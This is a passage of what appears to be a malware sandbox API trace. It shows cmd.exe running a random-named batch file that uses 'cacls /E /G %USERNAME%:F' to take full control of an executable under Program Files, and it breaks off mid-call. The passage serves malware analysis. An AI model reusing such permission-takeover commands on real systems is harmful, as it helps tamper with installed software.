lpConsoleTitle=0x2cf0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.430] GetProcessHeap () returned 0x2f0000 [0136.430] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x11c) returned 0x2f08e8 [0136.430] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0136.431] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0136.431] IdentifyCodeAuthzLevelW () returned 0x1 [0136.441] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0136.441] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0136.441] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0136.441] CloseCodeAuthzLevel () returned 0x1 [0136.441] SetErrorMode (uMode=0x0) returned 0x0 [0136.442] SetErrorMode (uMode=0x1) returned 0x0 [0136.442] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x303220, lpFilePart=0x2cefb8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2cefb8*="Ch81ANBE.bat") returned 0x32 [0136.442] SetErrorMode (uMode=0x0) returned 0x1 [0136.442] GetProcessHeap () returned 0x2f0000 [0136.442] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x72) returned 0x312ba0 [0136.442] wcsspn (_String=" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"", _Control=" \x09") returned 0x1 [0136.442] GetProcessHeap () returned 0x2f0000 [0136.442] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6a) returned 0x2f1140 [0136.442] GetProcessHeap () returned 0x2f0000 [0136.442] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xcc) returned 0x2f11b8 [0136.442] GetProcessHeap () returned 0x2f0000 [0136.442] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f11b8, Size=0x6c) returned 0x2f11b8 [0136.442] GetProcessHeap () returned 0x2f0000 [0136.442] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11b8) returned 0x6c [0136.442] CmdBatNotification () returned 0x303282 [0136.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0136.443] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0136.443] _get_osfhandle (_FileHandle=3) returned 0x78 [0136.443] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.443] _get_osfhandle (_FileHandle=3) returned 0x78 [0136.443] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.443] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0xe2, lpOverlapped=0x0) returned 1 [0136.444] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0136.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0136.445] _get_osfhandle (_FileHandle=3) returned 0x78 [0136.445] GetFileType (hFile=0x78) returned 0x1 [0136.445] _get_osfhandle (_FileHandle=3) returned 0x78 [0136.445] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x306ad0 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4008) returned 0x314b08 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x305820 [0136.445] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305820 | out: hHeap=0x2f0000) returned 1 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0136.445] GetProcessHeap () returned 0x2f0000 [0136.445] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306ad0 | out: hHeap=0x2f0000) returned 1 [0136.446] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0136.446] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0136.446] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0136.446] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0136.446] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0136.446] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0136.446] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0136.450] GetProcessHeap () returned 0x2f0000 [0136.450] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x58) returned 0x2f1230 [0136.450] GetProcessHeap () returned 0x2f0000 [0136.450] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x14) returned 0x2f0ab8 [0136.453] GetProcessHeap () returned 0x2f0000 [0136.453] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xac) returned 0x304170 [0136.453] _tell (_FileHandle=3) returned 32 [0136.453] _close (_FileHandle=3) returned 0 [0136.454] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cedb4 | out: _Buffer="\r\n") returned 2 [0136.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.454] GetFileType (hFile=0x7) returned 0x2 [0136.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.454] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced74 | out: lpMode=0x2ced74) returned 1 [0136.455] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.455] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceda0*=0x2) returned 1 [0136.456] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0136.456] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.456] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cedb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0136.456] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cedb0 | out: _Buffer=">") returned 1 [0136.456] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.456] GetFileType (hFile=0x7) returned 0x2 [0136.456] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.456] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced78 | out: lpMode=0x2ced78) returned 1 [0136.456] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.456] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceda4*=0x26) returned 1 [0136.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.457] GetFileType (hFile=0x7) returned 0x2 [0136.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceffc | out: lpMode=0x2ceffc) returned 1 [0136.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.458] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f0ac0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf028, lpReserved=0x0 | out: lpBuffer=0x2f0ac0*, lpNumberOfCharsWritten=0x2cf028*=0x5) returned 1 [0136.458] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf034 | out: _Buffer=" \"C:\\Program Files\\MSBuild\\executed_florists.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 82 [0136.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.458] GetFileType (hFile=0x7) returned 0x2 [0136.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0136.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.459] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x52) returned 1 [0136.460] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0136.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.460] GetFileType (hFile=0x7) returned 0x2 [0136.460] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0136.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.460] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0136.461] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0136.461] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0136.461] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0136.461] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0136.461] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0136.461] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0136.461] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0136.461] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0136.461] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0136.461] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0136.461] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0136.461] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0136.461] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0136.461] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0136.461] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0136.461] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0136.461] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0136.461] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0136.461] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0136.461] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0136.461] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0136.461] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0136.461] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0136.461] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0136.461] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0136.462] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0136.462] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0136.462] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0136.462] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0136.462] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0136.462] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0136.462] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0136.462] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0136.462] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0136.462] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0136.462] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0136.462] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0136.462] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0136.462] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0136.462] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0136.462] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0136.462] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0136.462] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0136.462] GetProcessHeap () returned 0x2f0000 [0136.462] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x418) returned 0x304228 [0136.462] SetErrorMode (uMode=0x0) returned 0x0 [0136.462] SetErrorMode (uMode=0x1) returned 0x0 [0136.463] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x304230, lpFilePart=0x2cedf8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cedf8*="Desktop") returned 0x25 [0136.463] SetErrorMode (uMode=0x0) returned 0x1 [0136.463] GetProcessHeap () returned 0x2f0000 [0136.463] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304228, Size=0x60) returned 0x304228 [0136.463] GetProcessHeap () returned 0x2f0000 [0136.463] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304228) returned 0x60 [0136.463] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.463] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.463] GetProcessHeap () returned 0x2f0000 [0136.463] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x120) returned 0x304290 [0136.463] GetProcessHeap () returned 0x2f0000 [0136.463] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x238) returned 0x3043b8 [0136.465] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3043b8, Size=0x122) returned 0x3043b8 [0136.465] GetProcessHeap () returned 0x2f0000 [0136.465] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3043b8) returned 0x122 [0136.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.465] GetProcessHeap () returned 0x2f0000 [0136.465] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe0) returned 0x3044e8 [0136.466] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3044e8, Size=0x76) returned 0x3044e8 [0136.466] GetProcessHeap () returned 0x2f0000 [0136.466] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3044e8) returned 0x76 [0136.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.466] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb74) returned 0xffffffff [0136.466] GetLastError () returned 0x2 [0136.466] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb74) returned 0xffffffff [0136.466] GetLastError () returned 0x2 [0136.467] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.467] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb74) returned 0x304568 [0136.467] GetProcessHeap () returned 0x2f0000 [0136.467] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3017f0, Size=0x4) returned 0x3017f0 [0136.468] FindClose (in: hFindFile=0x304568 | out: hFindFile=0x304568) returned 1 [0136.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb74) returned 0xffffffff [0136.468] GetLastError () returned 0x2 [0136.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb74) returned 0x304568 [0136.469] FindClose (in: hFindFile=0x304568 | out: hFindFile=0x304568) returned 1 [0136.469] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.469] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.469] GetConsoleTitleW (in: lpConsoleTitle=0x2cebc4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.470] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x304848, lpFilePart=0x2ce6e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ce6e4*="Desktop") returned 0x25 [0136.470] SetErrorMode (uMode=0x0) returned 0x1 [0136.470] GetProcessHeap () returned 0x2f0000 [0136.471] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304840, Size=0x60) returned 0x304840 [0136.471] GetProcessHeap () returned 0x2f0000 [0136.471] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304840) returned 0x60 [0136.471] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.471] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.471] GetProcessHeap () returned 0x2f0000 [0136.471] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x120) returned 0x3048a8 [0136.471] GetProcessHeap () returned 0x2f0000 [0136.474] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x238) returned 0x3049d0 [0136.474] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3049d0, Size=0x122) returned 0x3049d0 [0136.474] GetProcessHeap () returned 0x2f0000 [0136.474] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3049d0) returned 0x122 [0136.474] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.474] GetProcessHeap () returned 0x2f0000 [0136.474] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe0) returned 0x304b00 [0136.474] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304b00, Size=0x76) returned 0x304b00 [0136.474] GetProcessHeap () returned 0x2f0000 [0136.474] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304b00) returned 0x76 [0136.474] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.474] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ce460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce460) returned 0xffffffff [0136.475] GetLastError () returned 0x2 [0136.475] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2ce460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce460) returned 0xffffffff [0136.475] GetLastError () returned 0x2 [0136.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ce460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce460) returned 0x304b80 [0136.475] FindClose (in: hFindFile=0x304b80 | out: hFindFile=0x304b80) returned 1 [0136.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ce460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce460) returned 0xffffffff [0136.476] GetLastError () returned 0x2 [0136.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ce460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce460) returned 0x304b80 [0136.476] FindClose (in: hFindFile=0x304b80 | out: hFindFile=0x304b80) returned 1 [0136.476] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.476] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.476] GetConsoleTitleW (in: lpConsoleTitle=0x2ce958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.694] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ce7e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ce8a8 | out: lpAttributeList=0x2ce7e0, lpSize=0x2ce8a8) returned 1 [0136.694] UpdateProcThreadAttribute (in: lpAttributeList=0x2ce7e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ce8a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ce7e0, lpPreviousValue=0x0) returned 1 [0136.694] GetStartupInfoW (in: lpStartupInfo=0x2ce79c | out: lpStartupInfo=0x2ce79c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0136.694] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.696] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\executed_florists.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ce83c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\MSBuild\\executed_florists.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ce888 | out: lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\executed_florists.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x2ce888*(hProcess=0x74, hThread=0x78, dwProcessId=0x78c, dwThreadId=0x7c4)) returned 1 [0137.904] CloseHandle (hObject=0x78) returned 1 [0137.904] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.904] GetProcessHeap () returned 0x2f0000 [0137.905] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305f90 | out: hHeap=0x2f0000) returned 1 [0137.905] GetEnvironmentStringsW () returned 0x305f90* [0137.905] GetProcessHeap () returned 0x2f0000 [0137.905] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb36) returned 0x306ad0 [0137.905] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0137.905] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0153.254] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ce77c | out: lpExitCode=0x2ce77c*=0x1f57) returned 1 [0153.254] CloseHandle (hObject=0x74) returned 1 [0153.254] _vsnwprintf (in: _Buffer=0x2ce8c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ce788 | out: _Buffer="00001F57") returned 8 [0153.254] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0153.254] GetProcessHeap () returned 0x2f0000 [0153.254] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306ad0 | out: hHeap=0x2f0000) returned 1 [0153.254] GetEnvironmentStringsW () returned 0x305f90* [0153.254] GetProcessHeap () returned 0x2f0000 [0153.254] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb5c) returned 0x308178 [0153.255] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0153.255] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0153.255] GetProcessHeap () returned 0x2f0000 [0153.255] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308178 | out: hHeap=0x2f0000) returned 1 [0153.255] GetEnvironmentStringsW () returned 0x305f90* [0153.255] GetProcessHeap () returned 0x2f0000 [0153.255] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb5c) returned 0x308178 [0153.255] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0153.255] GetProcessHeap () returned 0x2f0000 [0153.255] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0db8 | out: hHeap=0x2f0000) returned 1 [0153.255] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ce7e0 | out: lpAttributeList=0x2ce7e0) [0153.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.255] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.256] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.256] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0153.257] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.257] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0153.257] SetConsoleInputExeNameW () returned 0x1 [0153.257] GetConsoleOutputCP () returned 0x1b5 [0153.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: 